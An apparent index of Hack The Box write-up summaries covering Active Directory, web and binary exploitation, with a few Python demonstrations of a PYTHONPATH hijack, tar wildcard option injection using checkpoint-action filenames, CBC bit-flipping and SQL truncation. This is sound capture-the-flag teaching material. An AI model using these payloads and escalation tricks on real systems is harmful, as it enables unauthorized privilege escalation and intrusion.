HTB: Blackfieldhtb-blackfield ctf hackthebox nmap dns ldap ldapsearch crackmapexec smbmap smbclient as-rep-roast hashcat bloodhound bloodhound-py rpc-password-reset pypykatz evil-winrm sebackupprivilege copy-filesepackupprivilege efs diskshadow ntds vss secretsdump smbserver icacls cipher windows-sessions metasploit meterpreter oscp-plus htb-forest htb-multimaster htb-re
Blackfield was a beautiful Windows Active Directory box where I’ll get to exploit AS-REP-roasting, discover privileges with bloodhound from my remote host using BloodHound.py, and then reset another user’s password over RPC. With access to another share, I’ll find a bunch of process memory dumps, one of which is lsass.exe, which I’ll use to dump hashes with pypykatz. Finally with a hash that gets a WinRM shell, I’ll abuse backup privileges to read the ntds.dit file that contains all the hashes for the domain (as well as a copy of the SYSTEM reg hive). I’ll use those to dump the hashes, and get access as the administrator. In Beyond Root, I’ll look at the EFS that prevented my reading root.txt using backup privs, as well as go down a rabbit hole into Windows sessions and why the cipher command was returning weird results.
HTB: Admirerhtb-admirer hackthebox ctf nmap debian gobuster robots-text source-code adminer mysql credentials sudo pythonpath path-hijack python-library-hijack oscp-like htb-nineveh htb-kryptos
Admirer provided a twist on abusing a web database interface, in that I don’t have creds to connect to any databases on Admirer, but I’ll instead connect to a database on my host and use queries to get local file access to Admirer. Before getting there, I’ll do some web enumeration to find credentials for FTP which has some outdated source code that leads me to the Adminer web interface. From there, I can read the current source, and get a password which works for SSH access. To privesc, I’ll abuse sudo configured to allow me to pass in a PYTHONPATH, allowing a Python library hijack.
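The PYTHONPATH hijack works because directories in PYTHONPATH land at the front of the module search path, ahead of the standard library. A minimal simulation (prepending to sys.path is what PYTHONPATH does at interpreter startup; shadowing shutil is just an example of a pure-Python stdlib module, not necessarily the exact import the script on Admirer uses):

```python
import os, sys, tempfile

# Write a fake "shutil" module into a directory we control.
hijack_dir = tempfile.mkdtemp()
with open(os.path.join(hijack_dir, "shutil.py"), "w") as f:
    # A real exploit would spawn a shell here; this just leaves a marker.
    f.write("HIJACKED = True\n")

sys.path.insert(0, hijack_dir)   # equivalent to PYTHONPATH=<hijack_dir>
sys.modules.pop("shutil", None)  # force a fresh import

import shutil                    # resolves to our fake module first
hijacked = getattr(shutil, "HIJACKED", False)
print(hijacked)                  # True

# Clean up so the real shutil is importable again afterwards.
sys.path.remove(hijack_dir)
del sys.modules["shutil"]
```

Against a `sudo` rule that preserves `SETENV`, the same trick becomes `sudo PYTHONPATH=/tmp/hijack python3 /path/to/privileged_script.py`.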
HTB: Multimasterhtb-multimaster ctf hackthebox nmap wfuzz waf filter unicode sqlmap tamper hashcat crackmapexec cyberchef python sqli injection windows mssql rid evil-winrm cef-debugging reverse-engineering bloodhound amsi powersploit as-rep-roast server-operators service service-hijack sebackupprivilege serestoreprivilege robocopy cve-2020-1472 zerologon htb-forest
Multimaster was a lot of steps, some of which were quite difficult. I’ll start by identifying a SQL injection in a website. I’ll have to figure out the WAF and find a way past that, dumping credentials but also writing a script to use MSSQL to enumerate the domain users. To pivot to the second user, I’ll exploit an instance of Visual Studio Code that’s left a CEF debugging socket open. That user has access to a DLL in the web directory, in which I’ll find more credentials to pivot to another user. This user has GenericWrite privileges on another user, so I’ll abuse that to get a shell. This final user is in the Server Operators group, allowing me to modify services to get a shell as SYSTEM. I’ll show two alternative roots, abusing the last user’s SeBackupPrivilege and SeRestorePrivilege with robocopy to read the flag, and using ZeroLogon to go right to administrator in one step.
ZeroLogon - Owning HTB machines with CVE-2020-1472cve-2020-1472 exploit domain-controller htb-monteverde zerologon impacket python virtualenv secretsdump
CVE-2020-1472 was patched in August 2020 by Microsoft, but it didn’t really make a splash until the last week when proof of concept exploits started hitting GitHub. It truly is a short path to domain admin. I’ll look at the exploit and own some machines from HTB with it.
HTB: Travelhackthebox ctf htb-travel nmap ubuntu vhosts wfuzz gobuster wordpress awesome-rss simplepie git gittools gitdumper source-code memcached ssrf filter deserialization php gopher gopherus payloadsallthethings webshell container docker database credentials password-reuse hashcat viminfo ldap authorizedkeyscommand ldif ldapadd getent htb-ypuffy
Travel was just a great box because it provided a complex and challenging puzzle with new pieces that were fun to explore. I’ll start off digging through various vhosts until I eventually find an exposed .git folder on one. That provides me the source for another, which includes a custom RSS feed that’s cached using memcache. I’ll evaluate that code to find a deserialization vulnerability on the read from memcache. I’ll create an exploit using a server-side request forgery attack to poison the memcache with a serialized PHP payload that will write a webshell, and then trigger it, gaining execution and eventually a shell inside a container. I’ll find a hash in the database which I can crack to get a password for the user on the main host. This user is also the LDAP administrator, and SSH is configured to check LDAP for logins. I’ll pick an arbitrary user and add an SSH private key, password, and the sudo group to their LDAP such that then when I log in as that user, I can just sudo to root. In Beyond Root I’ll explore a weird behavior I observed in the RSS feed.
HTB: Haircutctf htb-haircut hackthebox nmap php upload command-injection parameter-injection webshell gobuster curl filter screen oscp-like
Haircut started with some web enumeration where I’ll find a PHP site invoking curl. I’ll use parameter injection to write a webshell to the server and get execution. I’ll also enumerate the filters and find a way to get command execution in the page itself. To jump to root, I’ll identify a vulnerable version of screen that is set SUID (which is normal). I’ll walk through this exploit. In Beyond Root, I’ll take a quick look at the filtering put in place in the PHP page.
RoguePotato on Remotehtb-remote hackthebox ctf windows seimpersonate roguepotato lonelypotato juicypotato ippsec socat
JuicyPotato was a go-to exploit whenever I found myself with a Windows shell with SeImpersonatePrivilege, which typically was whenever there was some kind of webserver exploit. But Microsoft changed things in Server 2019 to break JuicyPotato, so I was really excited when splinter_code and decoder came up with RoguePotato, a follow-on exploit that works around the protections put into place in Server 2019. When I originally solved Remote back in March, RoguePotato had not yet been released. I didn’t have time last week to add it to my Remote write-up, so I planned to do a follow up post to show it. While in the middle of this post, I also watched IppSec’s video where he tries to use RoguePotato on Remote in a way that worked but shouldn’t have, raising a real mystery. I’ll dig into that and show what happened as well.
HTB: Remotehtb-remote hackthebox ctf nmap nfs umbraco hashcat nishang teamviewer credentials evilwinrm oscp-like
To own Remote, I’ll need to find a hash in a config file over NFS, crack the hash, and use it to exploit a Umbraco CMS system. From there, I’ll find TeamViewer Server running, and find where it stores credentials in the registry. After extracting the bytes, I’ll write a script to decrypt them providing the administrator user’s credentials, and a shell over WinRM or PSExec.
HTB: Mantishtb-mantis ctf hackthebox nmap smbmap smbclient rcpclient kerbrute orchard-cms gobuster mssql mssqlclient dbeaver crackmapexec ms14-068 kerberos golden-ticket goldenpac
Mantis was one of those Windows targets where it’s just a ton of enumeration until you get a System shell. The only exploit on the box was something I remember reading about years ago, where a low level user was allowed to make a privileged Kerberos ticket. To get there, I’ll have to avoid a few rabbit holes and eventually find creds for the SQL Server instance hidden on a webpage. The database has domain credentials for a user. I’ll use those to perform the attack, which will return SYSTEM access.
HTB: Quickhtb-quick hackthebox ctf nmap ubuntu gobuster vhosts wfuzz quic http3 curl edgeside-include-injection esi injection race-condition cracking python credentials su oscp-plus
Quick was a chance to play with two technologies that I was familiar with, but I had never put hands on with either. First it was finding a website hosted over Quic / HTTP version 3. I’ll build curl so that I can access that, and find creds to get into a ticketing system. In that system, I will exploit an edge side include injection to get execution, and with a bit more work, a shell. Next I’ll exploit a new website available on localhost and take advantage of a race condition that allows me to read and write arbitrary files as the next user. Finally, to get root I’ll find creds in a cached config file. In Beyond Root, I’ll use a root shell to troubleshoot my difficulties getting a shell and determine where things were breaking.
HTB: Calamityhtb-calamity ctf hackthebox nmap gobuster webshell scripting filter phpbash steganography audacity lxd bof gdb peda checksec nx mprotect python exploit pattern-create ret2libc youtube htb-obscurity htb-frolic htb-mischief
Calamity was released as Insane, but looking at the user ratings, it looked more like an easy/medium box. The user path through the box was relatively easy. Some basic enumeration gives access to a page that will run arbitrary PHP, which provides execution and a shell. There’s an audio steg challenge to get the user password and a user shell. People likely rated the box easier because there was an unintended root using lxd. I’ve done that before, and won’t show it here. The intended path was a contrived but interesting pwn challenge that involved three stages of input, the first two exploiting a very short buffer overflow to get access to a longer buffer overflow and eventually a root shell. In Beyond Root, I’ll look at some more features of the source code for the final binary to figure out what some assembly did, and why a simple return to libc attack didn’t work.
HTB: Magichackthebox ctf htb-magic nmap sqli injection upload filter gobuster webshell php mysqldump su suid path-hijack apache oscp-like htb-networked
Magic has two common steps, a SQLI to bypass login, and a webshell upload with a double extension to bypass filtering. From there I can get a shell, and find creds in the database to switch to user. To get root, there’s a binary that calls popen without a full path, which makes it vulnerable to a path hijack attack. In Beyond Root, I’ll look at the Apache config that led to execution of a .php.png file, the PHP code that filtered uploads, and the source for the suid binary.
HTB: Tracebackhtb-traceback ctf hackthebox nmap webshell vim gobuster smevk lua luvit ssh motd linpeas linenum
Traceback starts with finding a webshell that’s already on the server with some enumeration and a bit of open source research. From there, I’ll pivot to the next user with sudo that allows me to run Luvit, a Lua interpreter. To get root, I’ll notice that I can write to the message of the day directory. These scripts are run by root whenever a user logs in. I actually found this by seeing the cron that cleans up scripts dropped in this directory, but I’ll also show how to find it with some basic enumeration as well. In Beyond Root, I’ll take a quick look at the cron that’s cleaning up every thirty seconds.
HTB: Jokerhackthebox htb-joker ctf nmap udp tftp squid http-proxy foxyproxy hashcat penglab gobuster python werkzeug iptables socat sudo sudoedit sudoedit-follow ssh tar cron wildcard symbolic-link checkpoint htb-tartarsauce htb-shrek
Rooting Joker had three steps. The first was using TFTP to get the Squid Proxy config and creds that allowed access to a webserver listening on localhost that provided a Python console. To turn that into a shell, I’ll have to enumerate the firewall and find that I can use UDP. I’ll show two ways to abuse a sudo rule for the second step. I can take advantage of the sudoedit_follow flag, or just abuse the wildcards in the rule. The final pivot to root exploits a cron that’s creating tar archives, and I’ll show three different ways to abuse it.
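The tar wildcard abuse works because the shell, not tar, expands `*`, so attacker-created filenames land in tar’s argument list and are parsed as options. A sketch of just the expansion step (the filenames are the classic GNU tar checkpoint-action payload; shell.sh is a hypothetical payload script the attacker would also drop):

```python
import glob, os, tempfile

# Simulate a directory a root cron archives with: tar cf backup.tar *
workdir = tempfile.mkdtemp()
for name in ["notes.txt",
             "--checkpoint=1",
             "--checkpoint-action=exec=sh shell.sh"]:
    open(os.path.join(workdir, name), "w").close()

os.chdir(workdir)
# glob("*") is what the shell would substitute for the wildcard,
# handing the option-shaped filenames straight to tar's argv.
argv = sorted(glob.glob("*"))
print(argv)
```

When tar actually parses that argv, `--checkpoint-action=exec=...` runs the attacker’s script as the cron’s user, which is why `tar cf x.tar *` in a root cron is a privesc.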
Tunneling with Chisel and SSFhackthebox tunnel chisel ssf htb-redd.
HTB: Fattyhackthebox htb-fatty ctf java nmap ftp update-alternatives jar wireshark procyon javac directory-traversal filter reverse-engineering tar scp cron sqli injection deserialization ysoserial pspy htb-arkham
Fatty forced me way out of my comfort zone. The majority of the box was reversing and modifying a Java thick client. First I had to modify the client to get it to connect. Then I’ll take advantage of a directory traversal vulnerability to get a copy of the server binary, which I can reverse as well. In that binary, first I’ll find a SQL injection that allows me to log in as an admin user, which gives me access to additional functionality. One of the new functions uses serialized objects, which I can exploit using a deserialization attack to get a shell in the container running the server. Escalation to root attacks a recurring process that is using SCP to copy an archive of log files off the container to the host. By guessing that the log files are extracted from the archive, I’m able to create a malicious archive that allows me over the course of two SCPs to overwrite the root authorized_keys file and then SSH into Fatty as root.
Jar Files: Analysis and Modificationsjava reverse-engineering decompile jar recompile procyon javac. Updated 8 Aug 2020: Now that Fatty from HackTheBox has retired, I’ve updated this post to include some examples from it.
HTB Pwnbox Reviewctf hackthebox pwnbox parrot vm ssh scp tmux api
I was recently talking with some of the folks over at HackTheBox, and they asked my thoughts about Pwnbox. My answer was that I’d never really used it, but that I would give it a look and provide feedback. The system is actually quite feature packed. It is only available to VIP members, but if you are VIP, it’s worth spending a few minutes setting up the customizations. That way, if you should find yourself in need of an attack VM, you have it, and you might even just switch there.
HTB: Oouchhtb-oouch hackthebox ctf oauth nmap ftp vsftpd vhosts csrf gobuster api ssh container docker dbus iptables command-injection injection uwsgi waf cron htb-lame htb-secnotes
The first half of Oouch is built all around OAuth, a technology that is commonplace on the internet today, and yet I didn’t understand well coming into the challenge. This box forced me to gain an understanding, and writing this post cemented that even further. To get user, I’ll exploit an insecure implementation of OAuth via a CSRF twice. The first time to get access to qtc’s account on the consumer application, and then to get access to qtc’s data on the authorization server, which includes a private SSH key. With a shell, I’ll drop into the consumer application container and look at how the site was blocking XSS attacks, which includes some messaging over DBus leading to iptables blocks. I’ll pivot to the www-data user via a uWSGI exploit and then use command injection to get execution as root. In Beyond Root, I’ll look at the command injection in the root DBus server code.
HTB: Lazyhackthebox htb-lazy ctf nmap ubuntu php gobuster cookies python crypto burp burp-repeater padding-oracle padbuster firefox bit-flip ssh suid path-hijack hashcat penglab gdb ltrace cyberchef des peda debug
Lazy was a really solid old HackTheBox machine. It’s a medium difficulty box that requires identifying a unique and interesting cookie value and messing with it to get access to the admin account. I’ll show both a padding oracle attack and a bit-flipping attack that each allow me to change the encrypted data to grant admin access. That access provides an SSH key and a shell. To privesc, there’s a SetUID binary that is vulnerable to a path hijack attack. In Beyond Root, I’ll poke at the PHP source for the site, identify a third way to get logged in as admin, and do a bit of debugging on the SetUID binary.
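The bit-flip half of that attack relies only on how CBC chains blocks, so it can be sketched without the box’s real cipher or cookie. Below, a toy per-byte substitution stands in for the block cipher, and the `user=...` layout is illustrative, not Lazy’s exact cookie format; the point is that XORing a ciphertext block flips exactly those bits in the next plaintext block:

```python
import os

BLOCK = 8
# Invertible per-byte "cipher" so CBC malleability is visible without
# any crypto library. (7 is coprime with 256, so this is a permutation.)
SBOX = bytes((i * 7 + 3) % 256 for i in range(256))
INV = bytes(SBOX.index(i) for i in range(256))

def cbc_encrypt(pt, iv):
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        blk = bytes(SBOX[p ^ c] for p, c in zip(pt[i:i+BLOCK], prev))
        out, prev = out + blk, blk
    return out

def cbc_decrypt(ct, iv):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i+BLOCK]
        out += bytes(INV[b] ^ c for b, c in zip(blk, prev))
        prev = blk
    return out

pt = b"AAAAAAAAuser=no "          # block 1 (bytes 8-15) is "user=no "
iv = os.urandom(BLOCK)
ct = cbc_encrypt(pt, iv)

# Flipping bits in ciphertext block 0 garbles block 0's plaintext but
# flips exactly those bits in block 1: C0 ^= P1 ^ P1_desired.
evil = bytearray(ct)
for j in range(BLOCK):
    evil[j] ^= pt[BLOCK + j] ^ b"user=yes"[j]
print(cbc_decrypt(bytes(evil), iv)[BLOCK:])   # b'user=yes'
```

If the application only parses the field it cares about and tolerates (or never sees) the garbled block, the forged value sticks, which is the same idea as flipping Lazy’s cookie to claim the admin account.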
HTB: Cascadehackthebox htb-cascade ctf nmap rpc ldap ldapsearch smb tightvnc vncpwd evil-winrm crackmapexec sqlite dnspy debug ad-recycle oscp-plus
Cascade was an interesting Windows box all about recovering credentials from Windows enumeration. I’ll find credentials for an account in LDAP results, and use that to gain SMB access, where I find a TightVNC config with a different user’s password. From there, I get a shell and access to a SQLite database and a program that reads and decrypts a password from it. That password allows access to an account that is a member of the AD Recycle group, which I can use to find a deleted temporary admin account with a password, which still works for the main administrator account, providing a shell.
HTB: Shrekctf hackthebox htb-shrek nmap php gobuster audacity steganography crypto ssh ecc seccure python chown wildcard ghidra pspy passwd extended-attributes xattr lsattr cron suid
Shrek is another 2018 HackTheBox machine that is more a string of challenges as opposed to a box. I’ll find an uploads page in the website that doesn’t work, but then also find a bunch of malware (or malware-ish) files in the uploads directory. One of them contains a comment about a secret directory, which I’ll check to find an MP3 file. Credentials for the FTP server are hidden in a chunk of the file at the end. On the FTP server, there’s an encrypted SSH key, and a bunch of files full of base64-encoded data. Two have a passphrase and an encrypted blob, which I’ll decrypt to get the SSH key password, and use to get a shell. To privesc, I’ll find a process running chown with a wildcard, and exploit that to change the ownership of the passwd file to my user, so I can edit it and get a root shell. In Beyond Root, I’ll examine the text file in the directory and why it doesn’t get its ownership changed, look at the automation and find a curious part I wasn’t expecting, and show an alternative root based on that automation (which may be the intended path).
HTB: Saunactf hackthebox htb-sauna nmap windows ldapsearch ldap kerberos seclists as-rep-roast getnpusers hashcat evil-winrm smbserver winpeas autologon-credentials bloodhound sharphound neo4j dcsync secretsdump mimikatz wmiexec psexec oscp-plus
Sauna was a neat chance to play with Windows Active Directory concepts packaged into an easy difficulty box. I’ll start by using a Kerberos brute force on usernames to identify a handful of users, and then find that one of them has the flag set to allow me to grab their hash without authenticating to the domain. I’ll AS-REP Roast to get the hash, crack it, and get a shell. I’ll find the next user’s credentials in the AutoLogon registry key. BloodHound will show that user has privileges that allow it to perform a DC Sync attack, which provides all the domain hashes, including the administrator’s, which I’ll use to get a shell.
HTB: Tentenhackthebox htb-tenten ctf nmap wordpress wpscan gobuster wp-job-manager cve-2015-6668 python steganography steghide ssh john sudo mysql
Tenten had a lot of the much more CTF-like aspects that were more prevalent in the original HTB machines, like an uploaded hacker image file from which I’ll extract an SSH private key using steganography. I learned a really interesting lesson about wpscan and how to feed it an API key, and got to play with a busted WordPress plugin. In Beyond Root I’ll poke a bit at the WordPress database and see what was leaking via the plugin exploit.
HTB: Bookhackthebox ctf htb-book nmap ubuntu gobuster sql-truncation sql xss lfi pspy logrotate logrotten crontab oscp-plus
Getting a foothold on Book involved identifying and exploiting a few vulnerabilities in a website for a library. First there’s a SQL truncation attack against the login form to gain access as the admin account. Then I’ll use a cross-site scripting (XSS) attack against a PDF export to get file read from the local system. This is interesting because typically I think of XSS as something that I present to another user, but in this case, it’s the PDF generation software. I’ll use this to find a private SSH key and get a shell on the system. To get root, I’ll exploit a regular logrotate cron using the logrotten exploit, which is a timing attack against how logrotate works. In Beyond Root, I’ll look at the various crons on the box and how they made it work and cleaned up.
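The SQL truncation attack is easy to simulate: MySQL (in non-strict mode) silently truncates inserts to the column width, and string comparison ignores trailing spaces. A sketch of those two behaviors (the 20-character column width and the admin email are illustrative; Book’s actual schema isn’t shown here):

```python
WIDTH = 20  # hypothetical column width for the email field

def store(value):
    # MySQL in non-strict mode truncates values past the column width
    return value[:WIDTH]

def compare(a, b):
    # MySQL string comparison ignores trailing spaces
    return a.rstrip(" ") == b.rstrip(" ")

admin = "admin@book.htb"
# The registration form's uniqueness check sees the FULL payload, which
# genuinely differs from the admin's address...
payload = admin + " " * (WIDTH - len(admin)) + "junk"
print(compare(payload, admin))          # False: duplicate check passes

# ...but the INSERT truncates it, leaving "admin@book.htb" + spaces,
# which compares equal to the admin address on login.
stored = store(payload)
print(compare(stored, admin))           # True: collides with admin
```

So registering the padded address creates a second row whose email compares equal to the admin’s, with a password the attacker chose.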
HTB: Bankhtb-bank hackthebox ctf nmap vhosts dns dig zone-transfer wfuzz gobuster burp regex burp-repeater filter suid php passwd
Bank was a pretty straightforward box, though two of the major steps had unintended alternative methods. I’ll enumerate DNS to find a hostname, and use that to access a bank website. I can either find creds in a directory of data, or bypass creds all together by looking at the data in the HTTP 302 redirects. From there, I’ll upload a PHP webshell, bypassing filters, and get a shell. To get root, I can find a backdoor SUID copy of dash left by the administrator, or exploit write privileges in /etc/passwd. In Beyond Root, I’ll look at the coding mistake in the 302 redirects, and show how I determined the SUID binary was dash.
HTB: ForwardSlashhtb-forwardslash ctf hackthebox ubuntu nmap php vhosts wfuzz gobuster burp burp-repeater rfi lfi xxe credentials ssh sudo suid python luks crypto
ForwardSlash starts with enumeration of a hacked website to identify and exploit at least one of two LFI vulnerabilities (directly using filters to base64 encode or using XXE) to leak PHP source which includes a password which can be used to get a shell. From there, I’ll exploit a severely non-functional “backup” program to get file read as the other user. With this, I’ll find a backup of the website, and find different credentials in one of the pages, which I can use for a shell as the second user. To root, I’ll break a homespun encryption algorithm to load an encrypted disk image which contains root’s private SSH key. In Beyond Root, I’ll dig into the website source to understand a couple surprising things I found while enumerating.
HTB: Blockyhackthebox ctf htb-blocky nmap wordpress java jar decompile jd-gui phpmyadmin wpscan ssh sudo oswe-like oscp-like
Blocky really was an easy box, but did require some discipline when enumerating. It would be easy to miss the /plugins path that hosts two Java Jar files. From one of those files, I’ll find creds, which are reused by a user on the box, allowing me to get SSH access. To escalate to root, the user is allowed to run any command with sudo and a password, which I’ll use to run sudo su, returning a session as root.
HTB: PlayerTwoctf htb-playertwo hackthebox nmap vhosts gobuster wfuzz twirp proto3 api totp signing binwalk hexedit pspy php linux chisel mqtt paho python ssh exploit htb-rope heap tcache ldd patchelf ghidra checksec gdb pwntools type-juggling pwngdb htb-ellingson
PlayerTwo was just a monster of a box. Enumeration across three virtual hosts reveals a Twirp API where I can leak some credentials. Another API can be enumerated to find backup codes for the 2FA for the login. With creds and backup codes, I can log into the site, which has a firmware upload section. The example firmware is signed, but only the first roughly eight thousand bytes. I’ll find a way to modify the arguments to a call to system to get execution and a shell. With a shell, I see a MQTT message queue on localhost, and connecting to it, I’ll find a private SSH key being sent, which I can use to get a shell as the next user. Finally, to get to root, I’ll do a heap exploit against a root SUID binary to get a shell. In a Beyond Root section that could be its own blog post, I’ll dig into a few unintended ways to skip parts of the intended path, and dig deeper on others.
HTB: Popcornhtb-popcorn hackthebox ctf nmap ubuntu karmic gobuster torrent-hoster filter webshell php upload cve-2010-0832 arbitrary-write passwd dirtycow ssh oswe-like oscp-like htb-nineveh
Popcorn was a medium box that, while not on TJ Null’s list, felt very OSCP-like to me. Some enumeration will lead to a torrent hosting system, where I can upload, and, bypassing filters, get a PHP webshell to run. From there, I will exploit CVE-2010-0832, a vulnerability in the Linux authentication system (PAM) where I can get it to make my current user the owner of any file on the system. There’s a slick exploit script, but I’ll show manually exploiting it as well. I’ll quickly also show DirtyCow since it does work here.
HTB: ServMonhtb-servmon hackthebox ctf nmap windows ftp nvms-1000 gobuster wfuzz searchsploit directory-traversal lfi ssh crackmapexec tunnel exploit-db nsclient++ oscp-like
ServMon was an easy Windows box that required two exploits. There’s a hint in the anonymous FTP as to the location of a list of passwords. I can use a directory traversal bug in a NVMS 1000 web instance that will allow me to leak those passwords, and use one of them over SSH to get a shell. Then I can get the local config for the NSClient++ web instance running on TCP 8443, and use those credentials plus another exploit to get a SYSTEM shell.
HTB Endgame: XENendgame ctf hackthebox htb-xen nmap iis citrix xenapp smtp smtp-user-enum phishing swaks escape alwaysinstallelevated powerup uac-bypass msfvenom metasploit tunnel kerberoast getuserspns hashcat powerview crackmapexec password-spray ppk puttygen proxychains ssh kwprocessor keyboard-walks netscaler tcpdump packet-capture scp ssh wireshark ldap bloodhound sharphound xfreerdp winrm evil-winrm sebackupprivilege ntds diskshadow secretsdump wmiexec copy-filesebackupprivilege active-directory
Endgame XEN is all about owning a small network behind a Citrix virtual desktop environment. I’ll phish creds for the Citrix instance from users in the sales department, and then use them to get a foothold. I’ll break out of the restrictions in that environment, and then get administrator access. From there I’ll pivot into the domain, finding a Kerberoastable user and breaking the hash to get access to an SMB share with an encrypted SSH key. I’ll break that, and get access to the NetScaler device, where I’ll capture network traffic to find service creds in LDAP traffic. I’ll spray those creds against the domain to find they also work for a backup service, which I’ll use to access the DC, and to exfil the Active Directory database, where I can find the domain administrator hash.
HTB: Monteverdehtb-monteverde hackthebox ctf nmap windows active-directory smb smbclient smbmap rpc rpcclient crackmapexec password-spray credentials azure-active-directory evil-winrm azure-connect powershell sqlcmd mssql oscp-plus
For the third week in a row, a Windows box on the easier side of the spectrum with no web server retires. Monteverde was focused on Azure Active Directory. First I’ll look at RPC to get a list of users, and then check to see if any used their username as their password. With creds for SABatchJobs, I’ll gain access to SMB to find an XML config file with a password for one of the users on the box who happens to have WinRM permissions. From there, I can abuse the Azure Active Directory database to leak the administrator password. In Beyond Root, I’ll look deeper into two versions of the PowerShell script I used to leak the creds, and how they work or don’t work.
HTB Endgame: P.O.O.endgame ctf hackthebox htb-poo nmap iis windows gobuster ds-store iis-shortname wfuzz mssql mssqlclient mssql-linked-servers xp-cmdshell mssql-triggers sp_execute_external_script web-config ipv6 winrm sharphound bloodhound kerberoast invoke-kerberoast hashcat powerview juicypotato active-directory
Endgame Professional Offensive Operations (P.O.O.) was the first Endgame lab released by HTB. Endgame labs require at least Guru status to attempt (though now that P.O.O. is retired, it is available to all VIP). The lab contains two Windows hosts, and I’m given a single IP that represents the public facing part of the network. To collect all five flags, I’ll take advantage of DS_STORE files and Windows short filenames to get creds for the MSSQL instance, abuse trust within MSSQL to escalate my access to allow for code execution. Basic xp_cmdshell runs as a user without much access, but Python within MSSQL runs as a more privileged user, allowing me access to a config file with the administrator credentials. I’ll observe that WinRM is not blocked on IPv6, and get a shell. To pivot to the DC, I’ll run SharpHound and see that a kerberoastable user has Generic All on the Domain Admins group, get the hash, break it, and add that user to DA.
HTB: Nesthtb-nest ctf hackthebox nmap smb smbmap smbclient crypto vb visual-studio dnspy dotnetfiddle crackmapexec alternative-data-streams psexec oscp-plus htb-hackback htb-dropzone htb-bighead
Nest was unique in that it was all about continually increasing SMB access, with a little bit of easy .NET RE thrown in. I probably would rate the box medium instead of easy, because of the RE, but that’s nitpicking. I’ll start with unauthenticated access to a share, and find a password for tempuser. With that access, I’ll find an encrypted password for C.Smith. I’ll also use a Notepad++ config to find a new directory I can access (inside one I can’t), which reveals a Visual Basic Visual Studio project that includes the code to decrypt the password. With access as C.Smith, I can find the debug password for a custom application listening on 4386, and use that to leak another encrypted password. This time I’ll debug the binary to read the decrypted administrator password from memory, and use it to get a shell as SYSTEM with PSExec. When this box was first released, there was an error where the first user creds could successfully PSExec. I wrote a post on that back in January, but I’ve linked that post to this one on the left. In Beyond Root, I’ll take a quick look at why netcat can’t connect to the custom service on 4386, but telnet can.
Debugging CME, PSexec on HTB: Resolutecrackmapexec smb hackthebox ctf htb-resolute windows scmanager sddl dacl psexec github source-code metasploit wireshark smb cyberchef scdbg htb-nest
When I ran CrackMapExec with ryan’s creds against Resolute, it returned Pwn3d!, which is weird, as none of the standard PSExec exploits I attempted worked. Beyond that, ryan wasn’t an administrator, and didn’t have any writable shares. I’ll explore the CME code to see why it returned Pwn3d!, look at the requirements for a standard PSExec, and then debug the Metasploit exploit that does go directly to SYSTEM with ryan’s creds.
HTB: Resolutehtb-resolute ctf hackthebox nmap smb smbmap smbclient rpcclient rpc password-spray crackmapexec evil-winrm pstranscript net-use dnscmd msfvenom smbserver lolbas winrm htb-forest htb-hackback
It’s always interesting when the initial nmap scan shows no web ports as was the case in Resolute. The attack starts with enumeration of user accounts using Windows RPC, including a list of users and a default password in a comment. That password works for one of the users over WinRM. From there I find the next user’s creds in a PowerShell transcript file. That user is in the DnsAdmins group, which allows for an attack against dnscmd to get SYSTEM. In Beyond Root, I’ll identify the tool the box creator used to connect to the box and generate the PowerShell transcript.
HTB: Grandpahackthebox ctf htb-grandpa windows-2003 iis nmap gobuster webdav davtest searchsploit msfvenom cve-2017-7269 explodingcan metasploit icacls systeminfo windows-exploit-suggester seimpersonate churrasco oscp-like htb-granny
Grandpa was one of the really early HTB machines. It’s the kind of box that wouldn’t show up in HTB today, and frankly, isn’t as fun as modern targets. Still, it’s a great proxy for the kind of things that you’ll see in OSCP, and does teach some valuable lessons, especially if you try to work without Metasploit. With Metasploit, this box can probably be solved in a few minutes. Typically, the value in avoiding Metasploit comes from being able to really understand the exploits and what’s going on. In this case, it’s more about the struggle of moving files, finding binaries, etc.
HTB: Ropehackthebox ctf htb-rope directory-traversal format-string pwntools bruteforce pwn python ida aslr pie sudo library tunnel canary rop
Rope was all about binary exploitation. For initial access, I’ll use a directory traversal bug in the custom webserver to get a copy of that webserver as well as its memory space. From there, I can use a format string vulnerability to get a shell. To get to the next user, I’ll take advantage of an unsafe library load in a program that the current user can run with sudo. Finally, for root, I’ll exploit a locally running piece of software that requires brute forcing the canary, RBP, and return addresses to allow for an overflow and defeat PIE, and then doing a ROP libc leak to get past ASLR, all to send another ROP which provides a shell.
HTB: Arctichtb-arctic ctf hackthebox nmap coldfusion javascript searchsploit jsp upload metasploit directory-traversal crackstation windows-exploit-suggester ms10-059 oscp-like
Arctic would have been much more interesting if not for the 30-second lag on each HTTP request. Still, there’s enough of an interface for me to find a ColdFusion webserver. There are two different paths to getting a shell, either an unauthenticated file upload, or leaking the login hash, cracking or using it to log in, and then uploading a shell jsp. From there, I’ll use MS10-059 to get a root shell.
HTB: Patentsctf htb-patents hackthebox nmap upload libreoffice office xxe gobuster docx custom-folder sans-holiday-hack dtd log-poisoning directory-traversal lfi webshell docker pspy password-reuse git reverse-engineering bof exploit python pwntools ghidra pwn onegadget rop libc libc-database df mount cyberchef php payloadsallthethings
Patents was a really tough box, that probably should have been rated insane. I’ll find two listening services, a webserver and a custom service. I’ll exploit XXE in Libre Office that’s being used to convert docx files to PDFs to leak a configuration file, which uncovers another section of the site. In that section, there is a directory traversal vulnerability that allows me to use log poisoning to get execution and a shell in the web docker container. To get root in that container, I’ll find a password in the process list. As root, I get access to an application that’s communicating with the custom service on the host machine. I’ll also find a Git repo with the server binary, which I can reverse and find an exploit in, resulting in a shell as root on the host machine. In Beyond Root, I’ll look at chaining PHP filters to exfil larger data over XXE.
ngrok FTWctf ngrok tunnel.
HTB: Obscurityhtb-obscurity ctf hackthebox nmap python gobuster dirsearch wfuzz python-injection command-injection code-analysis crypto credentials race-condition injection lxd lxc arbitrary-write python-path htb-mischief
Obscurity was a medium box that centered on finding bugs in Python implementations of things - a webserver, an encryption scheme, and an SSH client. I’ll start by locating the source for the custom Python webserver, and injecting into it to get code execution and a shell. I’ll pivot to the next user abusing a poor custom cipher to decrypt a password. To get root, I’ll show four different ways. Two involve an SSH-like script that I can abuse both via a race condition to leak the system hashes and via injection to run a command as root instead of the authed user. The other two were patched after the box was released, but I’ll show them, exploiting the Python path, and exploiting the lxd group.
COVID-19 CTF: CovidScammersctf wireshark reverse-engineering ltrace crypto python pwntools fuzz bof pattern-create shellcode dup2
